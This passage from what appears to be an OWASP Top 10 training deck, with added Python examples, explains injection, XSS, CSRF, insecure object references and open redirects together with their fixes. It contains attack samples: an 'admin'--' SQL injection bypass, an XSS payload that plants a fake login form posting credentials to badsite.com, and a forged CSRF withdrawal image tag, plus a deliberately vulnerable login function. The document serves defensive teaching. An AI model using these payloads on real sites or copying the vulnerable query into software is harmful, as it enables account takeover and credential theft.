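    sql = ("SELECT * FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    """Slide 8's fix: a prepared statement with bound parameters. The SQL
    text is fixed in advance; username and password are passed as values,
    so a quote or -- inside them never changes the statement."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # With the name from slide 7 the concatenated query becomes
    #   ... WHERE username = 'admin'--' AND password = 'anything'
    # and the password check is commented out.
    print(login_vulnerable(db, "admin'--", "anything"))     # True: bypassed
    print(login_parameterized(db, "admin'--", "anything"))  # False: no such user
    print(login_parameterized(db, "admin", "c0rr3ct"))      # True: real login
```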
9. A2: Broken Authentication and Session Management
Attack Vector: Average | Weakness Prevalence: Widespread | Weakness Detectability: Average | Technical Impact: Severe
• HTTP is stateless
• Session IDs are used to track state, and are as good as credentials to an attacker
• Can be accessed via sniffer, logs, XSS…
• Change my password, forgotten my password, secret questions …
• Impact: sessions hijacked / accounts compromised

10. A2: Broken Authentication and Session Management
• Prevention:
  • Use standard implementations
  • Use SSL for ALL requests
  • Thoroughly test all authentication related functionality
  • Use the Secure & HttpOnly cookie flags
  • Avoid XSS flaws

11. A3: Cross Site Scripting (XSS)
Attack Vector: Average | Weakness Prevalence: VERY Widespread | Weakness Detectability: Easy | Technical Impact: Moderate
• Injecting malicious content/code into web pages
• HTML / JavaScript most common, but many other technologies are also vulnerable:
  • Java, ActiveX, Flash, RSS, Atom, …
• Present in 68% of all web applications in 2011
• Can be present in form and URL parameters AND cookies

12. A3: Cross Site Scripting (XSS)
• Impact:
  • Session hijacking
  • Unauthorized data access
  • Web page rewriting
  • Redirect users (e.g. to phishing or malware sites)
  • Anything the web application can do…

13. A3: Cross Site Scripting (XSS)
(Diagram: Reflected and Persistent XSS)

14. A3: Cross Site Scripting (XSS)
(Diagram: DOM XSS)

15. A3: Cross Site Scripting (XSS)
• Forum post: "Have you seen XYZ are being taken over?? http://tinyurl/jdfgshr"
• Page the link leads to, titled "XYZ – We're being taken over!":
  https://www.xyz.com/s=%3C%2Fdiv%3E%E2%80%9C%3Cscript%3Edocument.title%3D%E2%80%98XYZ%20
  Search this site:
  Yes, we're being taken over, but don't worry: login to find out why this is a good thing!
  Username:
  Password:
  Login

16. A3: Cross Site Scripting (XSS)
• The same page with the search term shown as text, titled "XYZ – No Search Result found!":
  https://www.xyz.com/s=%3C%2Fdiv%3E%E2%80%9C%3Cscript%3Edocument.title%3D%E2%80%98XYZ%2
  Search this site:
  No search result found for: "</div><script>document.title='XYZ – We're being taken over!'; Document.getElementById('results').style.display='none'; </script> Yes, we're being taken over, but don't worry: login to find out why this is a good thing! <table><form action='http://badsite.com/gotcha'> <tr><td>Username:</td><td><input id='user'></td></tr> <tr><td>Password:</td><td><input id='password' type=…"

17. A3: Cross Site Scripting (XSS)
• View Source:
  :
  <div id="results">
  <p>No search result found for: </p>
  <!-- start of users search term -->
  "</div><script>document.title='XYZ – We're being taken over!'; Document.getElementById('results').style.display='none'; </script> Yes, we're being taken over, but don't worry: login to find out why this is a good thing! <table><form action='http://badsite.com/gotcha'> <tr><td>Username:</td><td><input id='user'></td></tr> <tr><td>Password:</td><td><input id='password' type=…"
  <!-- end of users search term -->
  :

18. A3: Cross Site Scripting (XSS)
• Prevention:
  • Whitelist input
  • Encode output (e.g. using OWASP ESAPI)
  • Don't output user supplied input
  • If you must support user supplied HTML, use libraries like OWASP's AntiSamy
• OWASP XSS Prevention Cheat Sheet
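The results page from slide 17 rendered twice: once writing the raw search term into the div, once with the output encoding and input whitelist from slide 18. This is an added example, not the deck's code; the shortened attack term, the page fragments and the search_term_allowed rule are constructed for it.

```python
import html
import re

# Constructed stand-in for the search term on slide 16, cut down to the part
# that matters: it closes the results div and opens a script element.
ATTACK_TERM = '</div><script>document.title="XYZ - We are being taken over!";</script>'

# The results page from slide 17 (view source), split around the search term.
PAGE_BEFORE = ('<div id="results">\n'
               '<p>No search result found for: </p>\n'
               '<!-- start of users search term -->\n')
PAGE_AFTER = '\n<!-- end of users search term -->\n</div>'


def render_vulnerable(term):
    """Slide 17's page: the raw search term is written straight into the
    HTML body, so markup in the term becomes markup in the page."""
    return PAGE_BEFORE + term + PAGE_AFTER


def render_encoded(term):
    """Slide 18, "Encode output": entity-encode before writing into an element
    body, so '<', '>', '&' and quotes can no longer open a tag or attribute."""
    return PAGE_BEFORE + html.escape(term, quote=True) + PAGE_AFTER


# Slide 18, "Whitelist input": accept only what a search term legitimately
# needs (a constructed rule). A rejected term never reaches the page at all.
SEARCH_TERM_RE = re.compile(r"[A-Za-z0-9 ._-]{1,100}")


def search_term_allowed(term):
    return SEARCH_TERM_RE.fullmatch(term) is not None


def opens_script_element(page):
    """Check used for the comparison: does the rendered page contain a real
    <script> start tag (as opposed to its entity-encoded text)?"""
    return re.search(r"<script\b", page, re.IGNORECASE) is not None


if __name__ == "__main__":
    print(opens_script_element(render_vulnerable(ATTACK_TERM)))  # True
    print(opens_script_element(render_encoded(ATTACK_TERM)))     # False
    print(search_term_allowed(ATTACK_TERM))                      # False
```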
19. A4: Insecure Direct Object Reference
Attack Vector: Easy | Weakness Prevalence: Common | Weakness Detectability: Easy | Technical Impact: Moderate
• A direct reference to an object that is not validated on each request
  • user=psiinon@gmail.com
  • company=Mega%20Corp
  • account=7352820
• Typically in FORM and URL parameters (cookies less likely)
• Impact: accounts and data compromised

20. A4: Insecure Direct Object Reference
• Attacker notices URL: acct=6065
• Modifies it to acct=6066
• Attacker can view (and maybe change?) the victim's account

21. A4: Insecure Direct Object Reference
• Prevention:
  • Use per user or per session indirect object references (ESAPI supports integer and random mapping)
  • Validate Direct Object References on each request
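Both preventions from slide 21 for the acct=6065 / acct=6066 case on slide 20: a per-session random mapping from opaque tokens to account ids, plus an ownership check on every request. This is an added example written for this page, not ESAPI's code; SessionReferenceMap, ACCOUNT_OWNER and the view_account functions are assumptions made for it.

```python
import secrets


class SessionReferenceMap:
    """Per-session indirect object references (random mapping, the approach
    the deck attributes to ESAPI, reimplemented here). Each session owns its
    own table of opaque token -> real account id, so a token issued to
    another session, or one never issued, resolves to nothing."""

    def __init__(self, token_bytes=8):
        self._direct_to_indirect = {}
        self._indirect_to_direct = {}
        self._token_bytes = token_bytes

    def add(self, direct_ref):
        """Register a real id and return its opaque token; the same id gets
        the same token within one session."""
        if direct_ref in self._direct_to_indirect:
            return self._direct_to_indirect[direct_ref]
        token = secrets.token_urlsafe(self._token_bytes)
        while token in self._indirect_to_direct:      # collision guard
            token = secrets.token_urlsafe(self._token_bytes)
        self._direct_to_indirect[direct_ref] = token
        self._indirect_to_direct[token] = direct_ref
        return token

    def get_direct(self, token):
        return self._indirect_to_direct.get(token)


# Constructed ownership data for slide 20's accounts 6065 and 6066.
ACCOUNT_OWNER = {6065: "bob", 6066: "alice"}


def build_session(user):
    """At login, map only the user's own accounts, so the session cannot
    even name anyone else's. Returns (map, tokens to use in links)."""
    refs = SessionReferenceMap()
    tokens = [refs.add(acct) for acct, owner in ACCOUNT_OWNER.items()
              if owner == user]
    return refs, tokens


def view_account(session_refs, user, token):
    """Resolve the indirect reference, then still validate ownership on this
    request instead of trusting whatever arrived in the URL."""
    acct = session_refs.get_direct(token)
    if acct is None or ACCOUNT_OWNER.get(acct) != user:
        return None
    return acct


def view_account_direct(user, acct):
    """Slide 21's other option: keep the direct id in the URL but check it
    against the logged-in user on every request (acct=6066 fails for bob)."""
    return acct if ACCOUNT_OWNER.get(acct) == user else None
```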
22. A5: Security Misconfiguration
Attack Vector: Easy | Weakness Prevalence: Common | Weakness Detectability: Easy | Technical Impact: Moderate
• Another multitude of sins :-)
• Server / Application configuration
• Lack of server and application hardening
• Unpatched OS, services, libraries
• Default accounts
• Detailed error messages (e.g. stack traces)
• Unprotected files and directories

23. A5: Security Misconfiguration
• Impact:
  • Server compromise
  • Exploitation of known vulnerabilities
• Prevention:
  • Repeatable server and application hardening process
  • Patch OS, services, libraries
  • Strong architecture that ensures secure separation between components

24. A6: Sensitive Data Exposure
Attack Vector: Difficult | Weakness Prevalence: Uncommon | Weakness Detectability: Average | Technical Impact: Severe
• Exposure of:
  • Credentials
  • Credit card numbers
  • Bank account details
  • Any sensitive data…
• In: Databases, Files, Logs, Backups …

25. A6: Sensitive Data Exposure
• Impact:
  • Attackers access or modify sensitive data
  • Attackers use sensitive data in further attacks
  • Company embarrassment, loss of trust
  • Company sued or fined

26. A6: Sensitive Data Exposure
• Prevention:
  • Identify sensitive data
  • Store as little sensitive data as possible :-)
  • Protect with suitable mechanisms (file, DB, element encryption, SSL)
  • Only use standard, well recognised algorithms
  • Check your implementation!

27. A7: Missing Function Level Access Control
Attack Vector: Easy | Weakness Prevalence: Common | Weakness Detectability: Average | Technical Impact: Moderate
• UI showing navigation to unauthorized functions
• Server side authentication or authorization checks missing
• Server side checks relying solely on attacker provided information
• Impact:
  • Unauthorized account and data access
  • Access to administrative functionality

28. A7: Missing Function Level Access Control
• Prevention:
  • Process for managing entitlements that's easy to update and audit
  • Deny access by default, require specific grants to specific roles for access to every function
  • Check workflow for correct state
29. A8: Cross Site Request Forgery
Attack Vector: Average | Weakness Prevalence: Common | Weakness Detectability: Easy | Technical Impact: Moderate
• Exploits sessions established in other browser windows or tabs
• Impact: Attacker can perform any action on behalf of the victim

30. A8: Cross Site Request Forgery
(Diagram: the victim's Browser, example.bank.com ($$$) and bad.site.com, with the steps numbered 1 to 5; bad.site.com serves a page containing <img src="…">)
• The image tag on the attacker's page:
  <img src="https://example.bank.com/withdraw?account=bob&amount=1000000&for=mallory">

31. A8: Cross Site Request Forgery
• Prevention:
  • Never allow GETs to change things
  • Anti CSRF tokens
    • Viewstate (ASP.NET)
    • OWASP CSRF Guard
  • Challenge-Response
    • Re-Authentication
    • CAPTCHA
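The withdraw request from slide 30 handled with the first two preventions from slide 31: a server that refuses state changes over GET and requires a per-session anti-CSRF token, checked in constant time. This is an added example, not code from the deck; the Session class, handle_withdraw and request_from_img are assumptions made for it.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit


class Session:
    """Server-side session for a logged-in user. The anti-CSRF token is
    issued once per session and only ever sent to the bank's own pages."""
    def __init__(self, user):
        self.user = user
        self.csrf_token = secrets.token_hex(16)


def render_withdraw_form(session):
    """The real withdraw form carries the token in a hidden field. A page on
    bad.site.com cannot read this form (same-origin policy), so it cannot
    copy the token into a forged request."""
    return ('<form method="POST" action="/withdraw">'
            f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
            '<input name="account"><input name="amount"><input name="for">'
            '</form>')


def handle_withdraw(session, method, params):
    """Slide 31: never allow GETs to change things, and require the session's
    anti-CSRF token on every state-changing request. Returns (status, text)."""
    if method != "POST":
        return 405, "state changes require POST"
    supplied = params.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), session.csrf_token.encode()):
        return 403, "missing or invalid anti-CSRF token"
    return 200, (f"withdrew {params['amount']} from {params['account']} "
                 f"for {params['for']}")


# Constructed reproduction of the <img> on slide 30, served by bad.site.com.
FORGED_IMG = ('<img src="https://example.bank.com/withdraw?'
              'account=bob&amount=1000000&for=mallory">')


def request_from_img(tag):
    """The request the victim's browser issues for that <img>: always a GET,
    sent with bob's cookies, but with no token because the attacker's page
    never had one. Returns (method, params)."""
    url = tag.split('src="', 1)[1].split('"', 1)[0]
    params = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    return "GET", params
```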
32. A9: Using Components with Known Vulnerabilities
Attack Vector: Average | Weakness Prevalence: Widespread | Weakness Detectability: Difficult | Technical Impact: Moderate
• As per the title!
• Impact:
  • Full range of weaknesses, including injection, broken access control, XSS …
  • Minimal → complete host takeover and data compromise

33. A9: Using Components with Known Vulnerabilities
• Prevention:
  • Identify all components and versions in use
  • Monitor security of these components
  • Keep components up to date
  • Establish security policies governing use
  • If necessary add wrappers to disable unused or vulnerable aspects of components

34. A10: Unvalidated Redirects and Forwards
Attack Vector: Average | Weakness Prevalence: Uncommon | Weakness Detectability: Easy | Technical Impact: Moderate
• Redirects are common and send the user to a new site .. which could be malicious if not validated!
  http://fail.com/redir.php?url=badsite.com
• Forwards (Transfers) send the request to a new page in the same application .. which could bypass authentication or authorization
  http://fail.com/redir.php?url=admin.php

35. A10: Unvalidated Redirects and Forwards
• Impact:
  • Redirect victim to phishing or malware site
  • Attacker's request is forwarded past security checks, allowing unauthorized function or data access
• Prevention:
  • Avoid using them
  • Don't use user supplied data for the destination
  • Validate any user data that must be used
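The validation from slide 35 applied to both URLs on slide 34: the redirect destination is accepted only if it stays on the site's own hosts, and the forward is looked up in a fixed table that carries the target's own access requirement. This is an added example, not the deck's code; SITE, the allow-lists and the two safe_*_target functions are assumptions made for it.

```python
from urllib.parse import urlsplit

SITE = "http://fail.com"                               # the deck's example site
ALLOWED_REDIRECT_HOSTS = {"fail.com", "www.fail.com"}  # constructed allow-list


def safe_redirect_target(url_param):
    """Validate user data that must be used as a redirect destination.
    Returns an absolute URL that stays on this site, or None when the
    value has to be rejected."""
    parts = urlsplit(url_param)
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative ("//host") URL: only http(s) on one
        # of our own hosts. hostname strips userinfo, so a value such as
        # "http://fail.com@badsite.com/" is judged by its real host.
        if parts.scheme not in ("http", "https"):
            return None                 # also blocks javascript:, data:, ...
        if parts.hostname not in ALLOWED_REDIRECT_HOSTS:
            return None
        return url_param
    # Scheme-less value: accept only a site-local path such as "/account".
    # "badsite.com" has no leading slash and is rejected; "/\\host" is
    # rejected because some browsers treat "\" like "/" and read a host.
    if not url_param.startswith("/") or url_param.startswith(("//", "/\\")):
        return None
    return SITE + url_param


# Slide 34's forward: redir.php?url=admin.php stays inside the application and
# can skip the authorization check the admin page relies on. Keep a fixed
# table of forwardable pages (constructed) with the role each one requires.
FORWARD_TARGETS = {"home": ("home.php", "user"), "admin": ("admin.php", "admin")}


def safe_forward_target(page_param, role):
    """Look the request up in the table instead of forwarding to whatever was
    supplied, and apply the target's own access check before forwarding."""
    entry = FORWARD_TARGETS.get(page_param)
    if entry is None:
        return None
    target, required_role = entry
    if required_role == "admin" and role != "admin":
        return None
    return target
```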
36. Where Next?
• Read and understand the full document!
• Read the OWASP Developers Guide
• Watch the OWASP AppSec Tutorial videos on YouTube
• Re-examine your code!
• Introduce a Secure Development Lifecycle
• Use tools like the OWASP Zed Attack Proxy :-)